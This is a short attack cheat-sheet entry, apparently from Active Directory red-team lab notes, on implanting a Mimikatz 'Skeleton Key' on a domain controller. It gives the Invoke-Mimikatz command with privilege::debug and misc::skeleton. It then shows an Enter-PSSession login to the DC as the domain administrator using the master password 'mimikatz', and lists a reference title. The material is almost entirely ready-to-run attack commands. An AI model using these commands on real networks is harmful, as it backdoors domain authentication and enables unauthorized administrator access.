Load Skeleton Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local-Credential dcorp\\administrator (password:mimikatz)

Resources

Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest

Skeleton Key